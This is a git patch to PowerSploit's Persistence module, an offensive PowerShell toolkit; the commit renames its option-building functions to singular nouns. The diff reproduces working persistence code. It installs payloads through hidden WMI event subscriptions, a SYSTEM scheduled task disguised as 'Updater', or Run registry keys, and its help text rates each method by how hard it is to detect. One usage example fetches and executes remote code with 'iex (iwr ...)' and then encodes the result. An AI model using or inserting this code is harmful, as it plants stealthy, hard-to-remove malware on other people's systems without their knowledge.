From bbd382e52a131b3e876ee145d7abd834cdfb5d0c Mon Sep 17 00:00:00 2001 From: mattifestation Date: Sun, 23 Feb 2014 10:31:24 -0500 Subject: #31 Persistence module function nouns are now singular The function names New-UserPersistenceOption and New-ElevatedPersistenceOptionNew-ElevatedPersistenceOption now conform to PowerShell naming best practices. --- Persistence/Add-Persistence.ps1 | 50 ++++---- Persistence/New-ElevatedPersistenceOption.ps1 | 170 +++++++++++++++++++++++++ Persistence/New-ElevatedPersistenceOptions.ps1 | 170 ------------------------- Persistence/New-UserPersistenceOption.ps1 | 128 +++++++++++++++++++ Persistence/New-UserPersistenceOptions.ps1 | 128 ------------------- Persistence/Persistence.psd1 | 4 +- 6 files changed, 325 insertions(+), 325 deletions(-) create mode 100644 Persistence/New-ElevatedPersistenceOption.ps1 delete mode 100644 Persistence/New-ElevatedPersistenceOptions.ps1 create mode 100644 Persistence/New-UserPersistenceOption.ps1 delete mode 100644 Persistence/New-UserPersistenceOptions.ps1 (limited to 'Persistence') diff --git a/Persistence/Add-Persistence.ps1 b/Persistence/Add-Persistence.ps1 index 27d7ba7..6b0e2de 100644 --- a/Persistence/Add-Persistence.ps1 +++ b/Persistence/Add-Persistence.ps1 @@ -8,7 +8,7 @@ function Add-Persistence PowerSploit Function: Add-Persistence Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause - Required Dependencies: New-ElevatedPersistenceOptions, New-UserPersistenceOptions + Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption Optional Dependencies: None .DESCRIPTION @@ -23,15 +23,15 @@ function Add-Persistence Specifies the path to your payload. -.PARAMETER ElevatedPersistenceOptions +.PARAMETER ElevatedPersistenceOption Specifies the trigger for the persistent payload if the target is running elevated. - You must run New-ElevatedPersistenceOptions to generate this argument. + You must run New-ElevatedPersistenceOption to generate this argument. -.PARAMETER UserPersistenceOptions +.PARAMETER UserPersistenceOption Specifies the trigger for the persistent payload if the target is not running elevated. - You must run New-UserPersistenceOptions to generate this argument. + You must run New-UserPersistenceOption to generate this argument. .PARAMETER PersistenceScriptName @@ -71,9 +71,9 @@ function Add-Persistence .EXAMPLE - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' - C:\PS>$UserOptions = New-UserPersistenceOptions -Registry -AtLogon - C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose + C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' + C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon + C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose Description ----------- @@ -82,9 +82,9 @@ function Add-Persistence .EXAMPLE C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle - C:\PS>$UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle - C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 + C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle + C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle + C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 Description ----------- @@ -108,10 +108,10 @@ function Add-Persistence $FilePath, [Parameter( Mandatory = $True )] - $ElevatedPersistenceOptions, + $ElevatedPersistenceOption, [Parameter( Mandatory = $True )] - $UserPersistenceOptions, + $UserPersistenceOption, [ValidateNotNullOrEmpty()] [String] @@ -136,12 +136,12 @@ function Add-Persistence #region Validate arguments - if ($ElevatedPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOptions') + if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption') { throw 'You provided invalid elevated persistence options.' } - if ($UserPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOptions') + if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption') { throw 'You provided invalid user-level persistence options.' } @@ -171,9 +171,9 @@ function Add-Persistence $RemovalScriptFile = "$($Path)\$($Leaf)" } - if ($PSBoundParameters['Path']) + if ($PSBoundParameters['FilePath']) { - Get-ChildItem $Path -ErrorAction Stop | Out-Null + Get-ChildItem $FilePath -ErrorAction Stop $Script = [IO.File]::ReadAllText((Resolve-Path $Path)) } else @@ -216,7 +216,7 @@ function Add-Persistence #region Process persistence options # Begin processing elevated persistence options - switch ($ElevatedPersistenceOptions.Method) + switch ($ElevatedPersistenceOption.Method) { 'PermanentWMI' { @@ -226,7 +226,7 @@ Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "nam Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject } - switch ($ElevatedPersistenceOptions.Trigger) + switch ($ElevatedPersistenceOption.Trigger) { 'AtStartup' { @@ -235,7 +235,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj 'Daily' { - $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOptions.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOptions.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" + $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" } default @@ -250,7 +250,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater" - switch ($ElevatedPersistenceOptions.Trigger) + switch ($ElevatedPersistenceOption.Trigger) { 'AtLogon' { @@ -259,7 +259,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj 'Daily' { - $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " + $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " } 'OnIdle' @@ -291,18 +291,18 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj } # Begin processing user-level persistence options - switch ($UserPersistenceOptions.Method) + switch ($UserPersistenceOption.Method) { 'ScheduledTask' { $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $UserTriggerRemoval = "schtasks /Delete /TN Updater" - switch ($UserPersistenceOptions.Trigger) + switch ($UserPersistenceOption.Trigger) { 'Daily' { - $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " + $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " } 'OnIdle' diff --git a/Persistence/New-ElevatedPersistenceOption.ps1 b/Persistence/New-ElevatedPersistenceOption.ps1 new file mode 100644 index 0000000..42a2437 --- /dev/null +++ b/Persistence/New-ElevatedPersistenceOption.ps1 @@ -0,0 +1,170 @@ +function New-ElevatedPersistenceOption +{ +<# +.SYNOPSIS + + Configure elevated persistence options for the Add-Persistence function. + + PowerSploit Function: New-ElevatedPersistenceOption + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. + +.PARAMETER PermanentWMI + + Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. + + Detection Difficulty: Difficult + Removal Difficulty: Difficult + User Detectable? No + +.PARAMETER ScheduledTask + + Persist via a scheduled task. + + Detection Difficulty: Moderate + Removal Difficulty: Moderate + User Detectable? No + +.PARAMETER Registry + + Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. + + Detection Difficulty: Easy + Removal Difficulty: Easy + User Detectable? Yes + +.PARAMETER AtLogon + + Starts the payload upon any user logon. + +.PARAMETER AtStartup + + Starts the payload within 240 and 325 seconds of computer startup. + +.PARAMETER OnIdle + + Starts the payload after one minute of idling. + +.PARAMETER Daily + + Starts the payload daily. + +.PARAMETER At + + Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup + +.EXAMPLE + + C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] + [Switch] + $PermanentWMI, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $ScheduledTask, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $Registry, + + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Switch] + $Daily, + + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [DateTime] + $At, + + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $OnIdle, + + [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $AtLogon, + + [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] + [Switch] + $AtStartup + ) + + $PersistenceOptionsTable = @{ + Method = '' + Trigger = '' + Time = '' + } + + switch ($PSCmdlet.ParameterSetName) + { + 'PermanentWMIAtStartup' + { + $PersistenceOptionsTable['Method'] = 'PermanentWMI' + $PersistenceOptionsTable['Trigger'] = 'AtStartup' + } + + 'PermanentWMIDaily' + { + $PersistenceOptionsTable['Method'] = 'PermanentWMI' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'ScheduledTaskAtLogon' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + + 'ScheduledTaskOnIdle' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'OnIdle' + } + + 'ScheduledTaskDaily' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'Registry' + { + $PersistenceOptionsTable['Method'] = 'Registry' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + } + + $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable + $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption' + + Write-Output $PersistenceOptions +} diff --git a/Persistence/New-ElevatedPersistenceOptions.ps1 b/Persistence/New-ElevatedPersistenceOptions.ps1 deleted file mode 100644 index 5e04286..0000000 --- a/Persistence/New-ElevatedPersistenceOptions.ps1 +++ /dev/null @@ -1,170 +0,0 @@ -function New-ElevatedPersistenceOptions -{ -<# -.SYNOPSIS - - Configure elevated persistence options for the Add-Persistence function. - - PowerSploit Function: New-ElevatedPersistenceOptions - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. - -.PARAMETER PermanentWMI - - Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. - - Detection Difficulty: Difficult - Removal Difficulty: Difficult - User Detectable? No - -.PARAMETER ScheduledTask - - Persist via a scheduled task. - - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No - -.PARAMETER Registry - - Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes - -.PARAMETER AtLogon - - Starts the payload upon any user logon. - -.PARAMETER AtStartup - - Starts the payload within 240 and 325 seconds of computer startup. - -.PARAMETER OnIdle - - Starts the payload after one minute of idling. - -.PARAMETER Daily - - Starts the payload daily. - -.PARAMETER At - - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup - -.EXAMPLE - - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] - [Switch] - $PermanentWMI, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $ScheduledTask, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $Registry, - - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Switch] - $Daily, - - [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [DateTime] - $At, - - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $OnIdle, - - [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $AtLogon, - - [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] - [Switch] - $AtStartup - ) - - $PersistenceOptionsTable = @{ - Method = '' - Trigger = '' - Time = '' - } - - switch ($PSCmdlet.ParameterSetName) - { - 'PermanentWMIAtStartup' - { - $PersistenceOptionsTable['Method'] = 'PermanentWMI' - $PersistenceOptionsTable['Trigger'] = 'AtStartup' - } - - 'PermanentWMIDaily' - { - $PersistenceOptionsTable['Method'] = 'PermanentWMI' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'ScheduledTaskAtLogon' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - - 'ScheduledTaskOnIdle' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'OnIdle' - } - - 'ScheduledTaskDaily' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'Registry' - { - $PersistenceOptionsTable['Method'] = 'Registry' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - } - - $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable - $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions' - - Write-Output $PersistenceOptions -} diff --git a/Persistence/New-UserPersistenceOption.ps1 b/Persistence/New-UserPersistenceOption.ps1 new file mode 100644 index 0000000..38ef72d --- /dev/null +++ b/Persistence/New-UserPersistenceOption.ps1 @@ -0,0 +1,128 @@ +function New-UserPersistenceOption +{ +<# +.SYNOPSIS + + Configure user-level persistence options for the Add-Persistence function. + + PowerSploit Function: New-UserPersistenceOption + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. + +.PARAMETER ScheduledTask + + Persist via a scheduled task. + + Detection Difficulty: Moderate + Removal Difficulty: Moderate + User Detectable? No + +.PARAMETER Registry + + Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. + + Detection Difficulty: Easy + Removal Difficulty: Easy + User Detectable? Yes + +.PARAMETER AtLogon + + Starts the payload upon any user logon. + +.PARAMETER OnIdle + + Starts the payload after one minute of idling. + +.PARAMETER Daily + + Starts the payload daily. + +.PARAMETER At + + Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +.EXAMPLE + + C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon + +.EXAMPLE + + C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $ScheduledTask, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $Registry, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Switch] + $Daily, + + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [DateTime] + $At, + + [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] + [Switch] + $OnIdle, + + [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] + [Switch] + $AtLogon + ) + + $PersistenceOptionsTable = @{ + Method = '' + Trigger = '' + Time = '' + } + + switch ($PSCmdlet.ParameterSetName) + { + 'ScheduledTaskAtLogon' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + + 'ScheduledTaskOnIdle' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'OnIdle' + } + + 'ScheduledTaskDaily' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Daily' + $PersistenceOptionsTable['Time'] = $At + } + + 'Registry' + { + $PersistenceOptionsTable['Method'] = 'Registry' + $PersistenceOptionsTable['Trigger'] = 'AtLogon' + } + } + + $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable + $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption' + + Write-Output $PersistenceOptions +} diff --git a/Persistence/New-UserPersistenceOptions.ps1 b/Persistence/New-UserPersistenceOptions.ps1 deleted file mode 100644 index 3b33ffa..0000000 --- a/Persistence/New-UserPersistenceOptions.ps1 +++ /dev/null @@ -1,128 +0,0 @@ -function New-UserPersistenceOptions -{ -<# -.SYNOPSIS - - Configure user-level persistence options for the Add-Persistence function. - - PowerSploit Function: New-UserPersistenceOptions - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.DESCRIPTION - - New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. - -.PARAMETER ScheduledTask - - Persist via a scheduled task. - - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No - -.PARAMETER Registry - - Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes - -.PARAMETER AtLogon - - Starts the payload upon any user logon. - -.PARAMETER OnIdle - - Starts the payload after one minute of idling. - -.PARAMETER Daily - - Starts the payload daily. - -.PARAMETER At - - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. - -.EXAMPLE - - C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon - -.EXAMPLE - - C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle - -.LINK - - http://www.exploit-monday.com -#> - - [CmdletBinding()] Param ( - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $ScheduledTask, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $Registry, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [Switch] - $Daily, - - [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] - [DateTime] - $At, - - [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] - [Switch] - $OnIdle, - - [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] - [Switch] - $AtLogon - ) - - $PersistenceOptionsTable = @{ - Method = '' - Trigger = '' - Time = '' - } - - switch ($PSCmdlet.ParameterSetName) - { - 'ScheduledTaskAtLogon' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - - 'ScheduledTaskOnIdle' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'OnIdle' - } - - 'ScheduledTaskDaily' - { - $PersistenceOptionsTable['Method'] = 'ScheduledTask' - $PersistenceOptionsTable['Trigger'] = 'Daily' - $PersistenceOptionsTable['Time'] = $At - } - - 'Registry' - { - $PersistenceOptionsTable['Method'] = 'Registry' - $PersistenceOptionsTable['Trigger'] = 'AtLogon' - } - } - - $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable - $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' - - Write-Output $PersistenceOptions -} diff --git a/Persistence/Persistence.psd1 b/Persistence/Persistence.psd1 index de97697..c793c69 100644 --- a/Persistence/Persistence.psd1 +++ b/Persistence/Persistence.psd1 @@ -31,7 +31,7 @@ CmdletsToExport = '*' ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) # List of all files packaged with this module -FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', - 'New-UserPersistenceOptions.ps1', 'Usage.md' +FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOption.ps1', + 'New-UserPersistenceOption.ps1', 'Usage.md' } -- cgit v1.2.3